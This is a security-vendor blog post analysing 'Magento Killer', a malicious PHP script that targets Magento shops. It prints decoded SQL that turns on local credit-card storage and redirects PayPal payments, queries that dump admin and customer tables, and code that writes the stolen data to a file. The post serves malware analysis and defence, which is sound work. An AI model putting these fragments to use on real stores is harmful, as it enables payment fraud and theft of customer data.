• Skip to primary navigation
  • Skip to content
  • Skip to primary sidebar
  • Skip to footer

Sucuri Blog

Website Security News

  • Products
    • Website Security Platform
    • Website Firewall (WAF)
    • Enterprise Website Security
    • Multisite Solutions
  • Features
    • Detection
    • Protection
    • Performance
    • Response
    • Backups
  • Partners
    • Agency Solutions
    • Partners
    • Referral Program
    • Ecommerce
  • Resources
    • Guides
    • Webinars
    • Infographics
    • SiteCheck
    • Reports
    • Email Courses
  • Immediate Help
  • Login
Magento Killer

Magento Killer

July 10, 2019Luke Leal

126
SHARES
FacebookTwitterSubscribe

A malicious PHP script, aptly given the name “Magento Killer” by its creator(s), has been found targeting Magento websites.

While it doesn’t actually kill the Magento installation, it does allow the attacker to modify data in the core_config_data table of the targeted Magento database.

$ConfKiller: Malicious Operations Used to Steal Payment Info

During the initial stages of the attack, the bad actor uses special SQL queries encoded in base64.

We’ve decoded these strings under their respective lines in the sample below for your reference:

$ConfKiller = array( 
         'Update DB (Savecc)' =>
base64_decode('VVBEQVRFIGBjb3JlX2NvbmZpZ19kYXRhYCBTRVQNCmBzY29wZWAgPSAnZGVmYXVsdCcsDQpgc2NvcGVfaWRgID0gJzAnLA0KYHBhdGhgID0gJ3BheW1lbnQvY2NzYXZlL2FjdGl2ZScsDQpgdmFsdWVgID0gJzEnDQpXSEVSRSBgcGF0aGAgPSAncGF5bWVudC9jY3NhdmUvYWN0aXZlJzs='),
//UPDATE `core_config_data` SET `scope` = 'default', `scope_id` = '0', `path` = 'payment/ccsave/active', `value` = '1' WHERE `path` = 'payment/ccsave/active';
         'Update PP (MailPP)' =>
base64_decode('VVBEQVRFIGBjb3JlX2NvbmZpZ19kYXRhYCBTRVQKYHNjb3BlYCA9ICdkZWZhdWx0JywKYHNjb3BlX2lkYCA9ICcwJywKYHBhdGhgID0gJ3BheXBhbC9nZW5lcmFsL2J1c2luZXNzX2FjY291bnQnLApgdmFsdWVgID0gJ1tyZWRhY3RlZF1AZ21haWwuY29tJwpXSEVSRSBgcGF0aGAgPSAncGF5cGFsL2dlbmVyYWwvYnVzaW5lc3NfYWNjb3VudCc7')
//UPDATE `core_config_data` SET `scope` = 'default', `scope_id` = '0', `path` = 'paypal/general/business_account', `value` = '[redacted]@gmail.com' WHERE `path` = 'paypal/general/business_account';

These two objects within the $ConfKiller variable’s array perform the following malicious operations. This enables payment information theft from a compromised Magento website:

  • Update DB (Savecc): Configures the Magento website to save client credit card information on the server, instead of sending it to the typical destination — a payment processor (e.g authorize.net).
  • Update PP (MailPP): Changes the PayPal merchant business account associated with the Magento site to whatever the hacker wants.

While Magento does encrypt the locally saved credit card information, it does not provide much protection in this particular scenario.

The attacker is able to steal the encryption key from the Magento file ./app/etc/local.xml as they already have access to the website’s filesystem. Once obtained, this key allows them to decrypt the credit card information into plaintext so they can using it for fraudulent transactions or sell the stolen data.

SQL Queries Used to Steal Data from Magento Databases

In order to realistically use the stolen payment data, the hacker must also steal the customer information from the database. They’ll be looking for the correct name, email address, physical mailing address, and other billing information associated with the stolen credit card.

To steal this additional information, they create another variable array used in their SQL queries from the injected Magento database.

            $query = array(
'admin_user'                        => 'SELECT * FROM admin_user' ,
'aw_blog_comment'                   => 'SELECT * FROM aw_blog_comment' ,
'core_email_queue_recipients'       => 'SELECT * FROM core_email_queue_recipients' ,
'customer_entity'                   => 'SELECT * FROM customer_entity' ,

The array listing has been shortened for brevity. But, it pulls any customer information stored in the most common Magento database tables (e.g customer_entity, newsletter_subscriber).

It then trims this data, keeping only the information required for fraudulent purchases. Finally, it generates a *-shcMail.txt file in the directory containing the relevant customer information.

$namefile = md5(time())."-shcMail.txt";
foreach ($query as $shc_key => $shc_query) {
$hasil = mysql_query($shc_query);
    while ( $kolom_db = mysql_fetch_assoc($hasil) ) {
        $mail[] = $kolom_db[$shcolom[$shc_key]];
        $myfile = fopen($namefile, "a+") or die("Unable to open file!");
        fwrite($myfile, $kolom_db[$shcolom[$shc_key]]."\r\n");
        fclose($myfile);

When running this malicious script in a web browser, it simply provides a hyperlink to the generated *-shcMail.txt file. Then it reports back to inform the attacker if the initial two-setting changes were successful or not.

Conclusion

If you believe your Magento installation has been compromised, you can use our step-by-step guide on how to identify and clean up a hacked Magento website.

We also offer affordable website security plans and remediation services, and would be happy to help lend a hand.

126
SHARES
FacebookTwitterSubscribe

Categories: Ecommerce Security, Magento Security, Sucuri, Website SecurityTags: Black Hat Tactics, Hacked Websites

About Luke Leal

Luke Leal is a member of the Malware Research team and joined the company in 2015. Luke's main responsibilities include threat research and malware analysis, which is used to improve our tools. His professional experience covers over eight years of deobfuscating malware code and using unique data from it to help in correlating patterns. When he’s not researching infosec issues or working on websites, you might find Luke traveling and learning about new things. Connect with him on Twitter.

Reader Interactions

Primary Sidebar

Socialize With Sucuri

We're actively engaged across multiple platforms. Follow us and let's connect!

  • Facebook
  • Twitter
  • LinkedIn
  • YouTube
  • Instagram
  • RSS Feed

Get Peace of Mind

2019 Threat Report

WAF Free Trial

Magento Webinar

PCI Compliance Guide

Magento Security Guide

Join Over 20,000 Subscribers!

Footer

Products

  • Website Firewall
  • Website AntiVirus
  • Website Backups
  • WordPress Security
  • Enterprise Services

Solutions

  • DDos Protection
  • Malware Detection
  • Malware Removal
  • Malware Prevention
  • Blacklist Removal

Support

  • Blog
  • Knowledge Base
  • SiteCheck
  • Research Labs
  • FAQ

Company

  • About
  • Media
  • Events
  • Employment
  • Contact
  • Testimonials
  • Facebook
  • Twitter
  • LinkedIn
  • Instagram

Customer Login

Sucuri Home

  • Terms of Use
  • Privacy Policy
  • Frequently Asked Questions

© 2021 Sucuri Inc. All rights reserved

Sucuri Cookie Policy
See our policy>>

Our website uses cookies, which help us to improve our site and enables us to deliver the best possible service and customer experience.